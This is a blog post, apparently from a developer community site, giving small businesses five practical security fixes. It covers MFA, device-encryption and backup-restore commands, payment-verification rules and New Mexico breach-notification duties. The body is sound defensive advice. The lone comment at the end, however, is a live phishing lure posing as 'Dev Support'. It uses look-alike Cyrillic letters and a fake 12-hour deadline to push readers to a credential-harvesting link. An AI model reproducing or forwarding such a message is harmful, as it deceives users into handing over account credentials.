If you're the developer, freelancer, or "computer person" at a small business, you probably also became the IT department. Remote and hybrid work made that job bigger: company data now lives on home routers, personal laptops, and cloud accounts nobody audits.
I'm writing this with New Mexico small businesses in mind, but the fixes apply anywhere. Most small business breaches aren't sophisticated. They come from the same five gaps.
1. Passwords are the only lock
A stolen or reused password is the easiest way in. Whoever controls email can reset nearly everything else.
Fix it this week:
- Turn on MFA for email first, then banking, payroll, and cloud storage.
- Prefer authenticator apps or hardware keys over SMS where possible.
- Roll out a business password manager so nobody reuses passwords.
2. Unmanaged devices and home Wi-Fi
An outdated laptop and a router with its default admin password are an open door.
Fix it this week: require updates, a screen lock, and full-disc encryption on every device that touches company data. Quick status checks:
# macOS: is FileVault on?
fdesetup status
# Linux: look for crypto_LUKS in the FSTYPE column
lsblk -f
# Windows (run as administrator): check BitLocker status
manage-bde -status
Also send staff a short home Wi-Fi checklist: change the router admin password, use WPA2 or WPA3, update the firmware, and put guests and smart devices on a separate network.
3. "Urgent" requests get through
At home, there's no coworker nearby to ask, "Did you get this weird email too?" Fake invoices and messages that look like the boss are common.
Fix it this week: make it a written rule that any request to send money or change payment details is confirmed by phone, using a number you already have. Make reporting a mistake safe, because delays make incidents worse.
4. Backups nobody has tested
A backup you've never restored is a hope, not a backup. Use the 3-2-1 rule: three copies, two storage types, and one offline or off-site.
Fix it this week: restore something. For example, with restic:
# Confirm snapshots exist and the repository is healthy
restic snapshots
restic check
# Restore one folder to a scratch location and verify it opens
restic restore latest --target /tmp/restore-test --include "/path/to/important/folder"
Put a recurring reminder on the calendar to repeat this twice a year.
5. Legal duties are unclear
New Mexico's Data Breach Notification Act expects businesses that hold residents' personal information to use reasonable security and to notify affected people after a breach. HIPAA, PCI DSS, or federal contractor requirements (like NIST SP 800-171 and CMMC) may also apply depending on the industry.
Fix it this week: write a one-page incident response plan with phone numbers for your IT provider, cyber insurance carrier, and an attorney. Confirm current requirements with legal counsel, since laws and thresholds change.
If you only have an hour
Turn on MFA for your business email. It's the highest-impact change most small businesses can make.
Free help
- Small Business Development Centers (SBDC) in New Mexico
- CISA's free resources for small organisations
- Your cyber insurance carrier, which may offer free risk assessments
General education only, not legal advice.
Discussion
What's the one security gap you keep finding at small businesses? Share it in the comments, and I'll cover the most common ones in a follow-up.
Top comments (1)
Dear User,
Due to an іncrеase іn bot aсtivity on the platfоrm, we requirе vеrify of your account.
Рleаsе log in vіa thе lіnk belоw:
• anti-bot.icu/5K0N5G7M9C4
Verificated dеadlinе - 12 hours.
Sincerely,Dev Suрpоrt